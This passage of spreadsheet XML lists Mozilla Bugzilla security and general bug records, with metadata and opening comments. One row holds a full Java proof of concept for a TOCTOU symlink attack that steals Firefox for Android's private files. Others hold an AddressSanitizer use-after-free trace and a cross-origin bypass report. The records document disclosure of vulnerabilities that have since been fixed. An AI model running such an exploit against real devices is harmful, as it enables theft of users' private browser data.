      <c r="V4361" t="n">
        <v>9</v>
      </c>
      <c r="W4361" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #845148 +++
I haven't run valgrind against m-c but I expect similar problems there.</t>
        </is>
      </c>
      <c r="X4361" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4362">
      <c r="A4362" t="n">
        <v>1684761</v>
      </c>
      <c r="B4362" t="inlineStr">
        <is>
          <t>2021-01-03 07:28:42 -0800</t>
        </is>
      </c>
      <c r="C4362" t="inlineStr">
        <is>
          <t>Firefox for Android - Theft of sensitive data</t>
        </is>
      </c>
      <c r="D4362" t="inlineStr">
        <is>
          <t>2024-05-30 10:25:36 -0700</t>
        </is>
      </c>
      <c r="E4362" t="n">
        <v>1</v>
      </c>
      <c r="F4362" t="n">
        <v>1</v>
      </c>
      <c r="G4362" t="n">
        <v>2</v>
      </c>
      <c r="H4362" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4362" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J4362" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4362" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4362" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4362" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4362" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4362" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main86+]</t>
        </is>
      </c>
      <c r="Q4362" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4362" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4362" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4362" t="n">
        <v>0</v>
      </c>
      <c r="U4362" t="n">
        <v>0</v>
      </c>
      <c r="V4362" t="n">
        <v>31</v>
      </c>
      <c r="W4362" t="inlineStr">
        <is>
          <t>Created attachment 9195132
app-debug.apk
There is a TOCTOU vulnerability that can lead to the theft of users' private files (such as cookies databases) in /data/data/org.mozilla.firefox/ .
PoC:
```java
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        try {
            File payload = new File(getDataDir(), "test.html");
            payload.delete();
            payload.createNewFile();
            payload.setReadable(true, false);
            payload.setWritable(true, false);
            payload.setExecutable(true, false);
            FileOutputStream fos = null;
            fos = new FileOutputStream(payload);
            String evilhtml = "&lt;html&gt;\n" +
                    "&lt;h1 id=\"try\"&gt;&lt;/h1&gt;\n" +
                    "&lt;script&gt;\n" +
                    "let count = 1;\n" +
                    "let timer = setInterval(()=&gt;{\n" +
                    "    document.getElementById(\"try\").innerHTML = \"try \" + count;\n" +
                    "    count++;\n" +
                    "    let xhr = new XMLHttpRequest();\n" +
                    "    try {\n" +
                    "        xhr.open(\"GET\", location.href, false);\n" +
                    "        xhr.send();\n" +
                    "        if(xhr.responseText.indexOf(\"#evilhtml#\") == -1) {\n" +
                    "            alert(xhr.responseText);\n" +
                    "            clearInterval(timer);\n" +
                    "        }\n" +
                    "    } catch(error){\n" +
                    "        //console.log(error);\n" +
                    "    }\n" +
                    "\n" +
                    "}, 100)\n" +
                    "&lt;/script&gt;\n" +
                    "&lt;/html&gt;";
            fos.write(evilhtml.getBytes());
            fos.close();
            Thread.sleep(1000); //adjust millis
            Intent intent = new Intent();
            intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.LauncherActivity"));
            intent.setAction(Intent.ACTION_VIEW);
            intent.setData(Uri.fromFile(payload));
            startActivity(intent);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
        try {
            Thread.sleep(5000); //adjust millis
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
        Thread createFileThread = new Thread() {
            @Override
            public void run() {
                while(running) {
                    try {
                        File payload = new File(getDataDir(), "test.html");
                        payload.delete();
                        payload.createNewFile();
                        Runtime.getRuntime().exec("ln -sf /data/data/org.mozilla.firefox/shared_prefs/org.mozilla.firefox_preferences.xml "
                                + payload.getAbsolutePath()).waitFor();
                        payload.setReadable(true, false);
                        payload.setWritable(true, false);
                        payload.setExecutable(true, false);
                    }
                    catch(Exception e) {
                        // should be never thrown
                        e.printStackTrace();
                    }
                }
            }
        };
        createFileThread.start();
    }
```
Firefox Version: 84.1.2
Android Version: 9
Steps to reproduce:
1. Open the PoC app. (app-debug.apk)
2. It will theft the private file of firefox. (/data/data/org.mozilla.firefox/shared_prefs/org.mozilla.firefox_preferences.xml)
Screen record:
https://drive.google.com/file/d/1rdvHF_i9tFuxLLilcNCBVJKcxnIz3L8y/view?usp=sharing</t>
        </is>
      </c>
      <c r="X4362" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4363">
      <c r="A4363" t="n">
        <v>972851</v>
      </c>
      <c r="B4363" t="inlineStr">
        <is>
          <t>2014-02-14 06:44:08 -0800</t>
        </is>
      </c>
      <c r="C4363" t="inlineStr">
        <is>
          <t>[tracker] simplify and enhance AAQ flow</t>
        </is>
      </c>
      <c r="D4363" t="inlineStr">
        <is>
          <t>2014-04-02 07:40:09 -0700</t>
        </is>
      </c>
      <c r="E4363" t="n">
        <v>1</v>
      </c>
      <c r="F4363" t="n">
        <v>1</v>
      </c>
      <c r="G4363" t="n">
        <v>5</v>
      </c>
      <c r="H4363" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4363" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4363" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K4363" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4363" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4363" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4363" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4363" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4363" t="inlineStr"/>
      <c r="Q4363" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4363" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4363" t="inlineStr">
        <is>
          <t>2014Q1</t>
        </is>
      </c>
      <c r="T4363" t="n">
        <v>1</v>
      </c>
      <c r="U4363" t="n">
        <v>0</v>
      </c>
      <c r="V4363" t="n">
        <v>8</v>
      </c>
      <c r="W4363" t="inlineStr">
        <is>
          <t>Last year we discussed major changes to the AAQ that are documented in this Etherpad: https://sumo.etherpad.mozilla.org/london-experiments 
This is a tracker to capture all the individual changes and work on as many of them as we can during Q1.</t>
        </is>
      </c>
      <c r="X4363" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4364">
      <c r="A4364" t="n">
        <v>786142</v>
      </c>
      <c r="B4364" t="inlineStr">
        <is>
          <t>2012-08-27 19:32:33 -0700</t>
        </is>
      </c>
      <c r="C4364" t="inlineStr">
        <is>
          <t>Heap-use-after-free in XPCWrappedNative::Mark</t>
        </is>
      </c>
      <c r="D4364" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:44 -0700</t>
        </is>
      </c>
      <c r="E4364" t="n">
        <v>1</v>
      </c>
      <c r="F4364" t="n">
        <v>1</v>
      </c>
      <c r="G4364" t="n">
        <v>3</v>
      </c>
      <c r="H4364" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4364" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4364" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4364" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4364" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4364" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4364" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4364" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4364" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q4364" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4364" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4364" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4364" t="n">
        <v>1</v>
      </c>
      <c r="U4364" t="n">
        <v>0</v>
      </c>
      <c r="V4364" t="n">
        <v>41</v>
      </c>
      <c r="W4364" t="inlineStr">
        <is>
          <t>This reproduces on trunk and hitting quite frequently with flaky test. I am trying to get a reliable testcase.
=================================================================
==24146== ERROR: AddressSanitizer heap-use-after-free on address 0x7f25472e02a0 at pc 0x7f2584cab0a4 bp 0x7fff7adad6b0 sp 0x7fff7adad6a8
READ of size 8 at 0x7f25472e02a0 thread T0
    #0 0x7f2584cab0a3 in XPCWrappedNative::Mark() const src/js/xpconnect/src/xpcprivate.h:2836
    #1 0x7f2584d22e14 in WrappedNativeMarker(JSDHashTable*, JSDHashEntryHdr*, unsigned int, void*) src/js/xpconnect/src/XPCWrappedNativeScope.cpp:433
    #2 0x7f258ff599d3 in JS_DHashTableEnumerate src/js/src/jsdhash.cpp:710
    #3 0x7f25848fd8ea in Native2WrappedNativeMap::Enumerate(JSDHashOperator (*)(JSDHashTable*, JSDHashEntryHdr*, unsigned int, void*), void*) src/js/xpconnect/src/XPCMaps.h:137
    #4 0x7f2584d22a14 in XPCWrappedNativeScope::MarkAllWrappedNativesAndProtos() src/js/xpconnect/src/XPCWrappedNativeScope.cpp:452
    #5 0x7f2584b4dd17 in XPCJSRuntime::FinalizeCallback(JSFreeOp*, JSFinalizeStatus, int) src/js/xpconnect/src/XPCJSRuntime.cpp:792
    #6 0x7f25900e6421 in BeginSweepPhase(JSRuntime*) src/js/src/jsgc.cpp:3779
    #7 0x7f25900e0cd0 in IncrementalCollectSlice(JSRuntime*, long, js::gcreason::Reason, js::JSGCInvocationKind) src/js/src/jsgc.cpp:4214
    #8 0x7f25900de5a2 in GCCycle(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4392
    #9 0x7f2590093509 in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4500
    #10 0x7f2590083101 in js::GCSlice(JSRuntime*, js::JSGCInvocationKind, js::gcreason::Reason, long) src/js/src/jsgc.cpp:4538
    #11 0x7f258ffe027f in js::IncrementalGC(JSRuntime*, js::gcreason::Reason, long) src/js/src/jsfriendapi.cpp:171
    #12 0x7f2581df8e5e in nsJSContext::GarbageCollectNow(js::gcreason::Reason, nsJSContext::IsIncremental, nsJSContext::IsCompartment, nsJSContext::IsShrinking, long) src/dom/base/nsJSEnvironment.cpp:2922
    #13 0x7f2581e407fe in InterSliceGCTimerFired(nsITimer*, void*) src/dom/base/nsJSEnvironment.cpp:3204
    #14 0x7f2589762d22 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #15 0x7f25897645d8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #16 0x7f25897279ce in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #17 0x7f25893c8e27 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #18 0x7f25881a5b2b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:117
    #19 0x7f25899d4bd9 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #20 0x7f25899d4a22 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #21 0x7f25899d4907 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #22 0x7f258766f7ae in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #23 0x7f25862e0448 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #24 0x7f257cae79b0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3800
    #25 0x7f257caedc24 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3877
    #26 0x7f257caf0cee in XRE_main src/toolkit/xre/nsAppRunner.cpp:3953
    #27 0x40c5bb in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #28 0x409e1f in main src/browser/app/nsBrowserApp.cpp:279
    #29 0x7f2599ba8c4d in ?? ??:0
0x7f25472e02a0 is located 32 bytes inside of 96-byte region [0x7f25472e0280,0x7f25472e02e0)
freed by thread T0 here:
    #0 0x4c3e30 in free ??:0
    #1 0x7f2596a46572 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7f2584c6d245 in operator delete(void*) src/../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7f2584c72fc0 in XPCWrappedNative::Release() src/js/xpconnect/src/XPCWrappedNative.cpp:1214
    #4 0x7f2584c73bfe in XPCWrappedNative::FlatJSObjectFinalized() src/js/xpconnect/src/XPCWrappedNative.cpp:1338
    #5 0x7f2584d143c2 in WrappedNativeFinalize(js::FreeOp*, JSObject*, WNHelperType) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:617
    #6 0x7f2584cdd10c in XPC_WN_NoHelper_Finalize(js::FreeOp*, JSObject*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:623
    #7 0x7f2590118cd8 in JSObject::finalize(js::FreeOp*) src/js/src/jsobjinlines.h:235
    #8 0x7f25900feb6a in bool js::gc::FinalizeTypedArenas&lt;JSObject&gt;(js::FreeOp*, js::gc::ArenaHeader**, js::gc::ArenaList&amp;, js::gc::AllocKind, js::SliceBudget&amp;) src/js/src/jsgc.cpp:412
    #9 0x7f259006a0b9 in js::gc::FinalizeArenas(js::FreeOp*, js::gc::ArenaHeader**, js::gc::ArenaList&amp;, js::gc::AllocKind, js::SliceBudget&amp;) src/js/src/jsgc.cpp:449
    #10 0x7f259006bb91 in js::gc::ArenaLists::finalizeNow(js::FreeOp*, js::gc::AllocKind) src/js/src/jsgc.cpp:1626
    #11 0x7f259006b4d3 in js::gc::ArenaLists::queueObjectsForSweep(js::FreeOp*) src/js/src/jsgc.cpp:1722
    #12 0x7f25900e5db9 in BeginSweepPhase(JSRuntime*) src/js/src/jsgc.cpp:3750
    #13 0x7f25900e0cd0 in IncrementalCollectSlice(JSRuntime*, long, js::gcreason::Reason, js::JSGCInvocationKind) src/js/src/jsgc.cpp:4214
    #14 0x7f25900de5a2 in GCCycle(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4392
    #15 0x7f2590093509 in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4500
    #16 0x7f2590083101 in js::GCSlice(JSRuntime*, js::JSGCInvocationKind, js::gcreason::Reason, long) src/js/src/jsgc.cpp:4538
    #17 0x7f258ffe027f in js::IncrementalGC(JSRuntime*, js::gcreason::Reason, long) src/js/src/jsfriendapi.cpp:171
    #18 0x7f2581df8e5e in nsJSContext::GarbageCollectNow(js::gcreason::Reason, nsJSContext::IsIncremental, nsJSContext::IsCompartment, nsJSContext::IsShrinking, long) src/dom/base/nsJSEnvironment.cpp:2922
    #19 0x7f2581e407fe in InterSliceGCTimerFired(nsITimer*, void*) src/dom/base/nsJSEnvironment.cpp:3204
    #20 0x7f2589762d22 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #21 0x7f25897645d8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #22 0x7f25897279ce in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #23 0x7f25893c8e27 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #24 0x7f25881a5b2b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:117
    #25 0x7f25899d4bd9 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #26 0x7f25899d4a22 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #27 0x7f25899d4907 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #28 0x7f258766f7ae in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #29 0x7f25862e0449 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
previously allocated by thread T0 here:
    #0 0x4c3ef0 in __interceptor_malloc ??:0
    #1 0x7f2596a466c6 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7f2584c6555b in operator new(unsigned long) src/../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7f2584a98040 in XPCConvert::NativeInterface2JSObject(XPCLazyCallContext&amp;, JS::Value*, nsIXPConnectJSObjectHolder**, xpcObjectHelper&amp;, nsID const*, XPCNativeInterface**, bool, unsigned int*) src/js/xpconnect/src/XPCConvert.cpp:920
    #4 0x7f2584a919be in XPCConvert::NativeData2JS(XPCLazyCallContext&amp;, JS::Value*, void const*, nsXPTType const&amp;, nsID const*, unsigned int*) src/js/xpconnect/src/XPCConvert.cpp:319
    #5 0x7f2584ad147b in XPCConvert::NativeData2JS(XPCCallContext&amp;, JS::Value*, void const*, nsXPTType const&amp;, nsID const*, unsigned int*) src/js/xpconnect/src/xpcprivate.h:3310
    #6 0x7f2584c97453 in CallMethodHelper::GatherAndConvertResults() src/js/xpconnect/src/XPCWrappedNative.cpp:2642
    #7 0x7f2584cf70c5 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1478
    #8 0x7f2590381951 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #9 0x7f259030ea41 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2413
    #10 0x7f2590275a35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #11 0x7f259038ec66 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:494
    #12 0x7f2590390c1e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:531
    #13 0x7f258fae8334 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5665
    #14 0x7f258faed2d1 in JS_EvaluateUCScriptForPrincipalsVersionOrigin src/js/src/jsapi.cpp:5746
    #15 0x7f2581e1162f in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1497
    #16 0x7f2581fc11bf in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9590
    #17 0x7f2581f78b39 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9851
    #18 0x7f2581fbf21a in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10118
    #19 0x7f2589762d22 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #20 0x7f25897645d8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #21 0x7f25897279ce in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #22 0x7f25893c8e27 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #23 0x7f25881a5595 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #24 0x7f25899d4bda in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:209
Shadow byte and word:
  0x1fe4a8e5c054: fd
  0x1fe4a8e5c050: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe4a8e5c030: 00 00 00 00 00 00 00 00
  0x1fe4a8e5c038: fb fb fb fb fb fb fb fb
  0x1fe4a8e5c040: fa fa fa fa fa fa fa fa
  0x1fe4a8e5c048: fa fa fa fa fa fa fa fa
=&gt;0x1fe4a8e5c050: fd fd fd fd fd fd fd fd
  0x1fe4a8e5c058: fd fd fd fd fd fd fd fd
  0x1fe4a8e5c060: fa fa fa fa fa fa fa fa
  0x1fe4a8e5c068: fa fa fa fa fa fa fa fa
  0x1fe4a8e5c070: fd fd fd fd fd fd fd fd
Stats: 287M malloced (327M for red zones) by 649602 calls
Stats: 79M realloced by 89263 calls
Stats: 248M freed by 411873 calls
Stats: 117M really freed by 185135 calls
Stats: 532M (136282 full pages) mmaped in 133 calls
  mmaps   by size class: 8:442341; 9:40955; 10:16380; 11:14329; 12:3072; 13:1536; 14:1280; 15:256; 16:448; 17:1248; 18:208; 19:104; 20:20;
  mallocs by size class: 8:550715; 9:52926; 10:18484; 11:17824; 12:3165; 13:2149; 14:1685; 15:376; 16:564; 17:1361; 18:228; 19:106; 20:19;
  frees   by size class: 8:331303; 9:43136; 10:15020; 11:14592; 12:2157; 13:1812; 14:1407; 15:329; 16:504; 17:1346; 18:149; 19:103; 20:15;
  rfrees  by size class: 8:136366; 9:24837; 10:9558; 11:10277; 12:996; 13:829; 14:830; 15:183; 16:354; 17:869; 18:30; 19:5; 20:1;
Stats: malloc large: 1714 small slow: 2570
==24146== ABORTING</t>
        </is>
      </c>
      <c r="X4364" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4365">
      <c r="A4365" t="n">
        <v>1228950</v>
      </c>
      <c r="B4365" t="inlineStr">
        <is>
          <t>2015-11-30 01:20:23 -0800</t>
        </is>
      </c>
      <c r="C4365" t="inlineStr">
        <is>
          <t>cross-origin restriction bypass &amp; arbitrary local file read using data: and view-source: uri scheme</t>
        </is>
      </c>
      <c r="D4365" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:29 -0700</t>
        </is>
      </c>
      <c r="E4365" t="n">
        <v>1</v>
      </c>
      <c r="F4365" t="n">
        <v>1</v>
      </c>
      <c r="G4365" t="n">
        <v>3</v>
      </c>
      <c r="H4365" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4365" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4365" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4365" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4365" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4365" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4365" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4365" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4365" t="inlineStr">
        <is>
          <t>[adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q4365" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4365" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4365" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T4365" t="n">
        <v>1</v>
      </c>
      <c r="U4365" t="n">
        <v>0</v>
      </c>
      <c r="V4365" t="n">
        <v>40</v>
      </c>
      <c r="W4365" t="inlineStr">
        <is>
          <t>Created attachment 8693479
poc.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20151029151421
Steps to reproduce:
Please access the following page.
http://llamakko:poc@cdc61702-f6af-4568-b485-e8b65871f801.gehirn.ne.jp/poc/
Click the 'CLICK ME!' button.
Wait for about six seconds.
Actual results:
Will display an alert dialog containing the HTML content of example.org.
cross-origin restriction bypass was successful.
Expected results:
If trying to change a protocol to data: uri scheme, that should not be successful.</t>
        </is>
      </c>
      <c r="X4365" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4366">
      <c r="A4366" t="n">
        <v>674042</v>
      </c>
      <c r="B4366" t="inlineStr">
        <is>
          <t>2011-07-25 13:38:58 -0700</t>
        </is>
      </c>
      <c r="C4366" t="inlineStr">
        <is>
          <t>WebGL: crash in getUniformLocation with too long uniform identifiers</t>
        </is>
      </c>
      <c r="D4366" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:15 -0700</t>
        </is>
      </c>
      <c r="E4366" t="n">
        <v>1</v>
      </c>
      <c r="F4366" t="n">
        <v>1</v>
      </c>
      <c r="G4366" t="n">
        <v>3</v>
      </c>
      <c r="H4366" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4366" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4366" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4366" t="inlineStr">
        <is>
          <t>5 Branch</t>
        </is>
      </c>
      <c r="L4366" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4366" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4366" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4366" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4366" t="inlineStr">
        <is>
          <t>[sg:vector-critical?][qa!]</t>
        </is>
      </c>
      <c r="Q4366" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4366" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4366" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T4366" t="n">
        <v>1</v>
      </c>
      <c r="U4366" t="n">
        <v>0</v>
      </c>
      <c r="V4366" t="n">
        <v>41</v>
      </c>
      <c r="W4366" t="inlineStr">
        <is>
          <t>Created attachment 548271
poc1.html.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Build ID: 20110707182747
Steps to reproduce:
I played arround with webgl and suddenly my browser crashed.
If the string parameter is too long in the function getUniformLocation the browser is going to crash.
I created a poc...
Actual results:
The browser crashed</t>
        </is>
      </c>
      <c r="X4366" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4367">
      <c r="A4367" t="n">
        <v>285532</v>
      </c>
      <c r="B4367" t="inlineStr">
        <is>
          <t>2005-03-09 19:26:56 -0800</t>
        </is>
      </c>
      <c r="C4367" t="inlineStr">
        <is>
          <t>GetSelectableProducts cannot run on PostgreSQL when classifications are enabled</t>
        </is>
      </c>
      <c r="D4367" t="inlineStr">
        <is>
          <t>2005-03-09 23:50:25 -0800</t>
        </is>
      </c>
      <c r="E4367" t="n">
        <v>1</v>
      </c>
      <c r="F4367" t="n">
        <v>1</v>
      </c>
      <c r="G4367" t="n">
        <v>4</v>
      </c>
      <c r="H4367" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4367" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4367" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4367" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L4367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4367" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4367" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4367" t="inlineStr"/>
      <c r="Q4367" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4367" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4367" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4367" t="n">
        <v>1</v>
      </c>
      <c r="U4367" t="n">
        <v>0</v>
      </c>
      <c r="V4367" t="n">
        <v>4</v>
      </c>
      <c r="W4367" t="inlineStr">
        <is>
          <t>We have a comma where we should have an INNER JOIN.</t>
        </is>
      </c>
      <c r="X4367" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4368">
      <c r="A4368" t="n">
        <v>1783561</v>
      </c>
      <c r="B4368" t="inlineStr">
        <is>
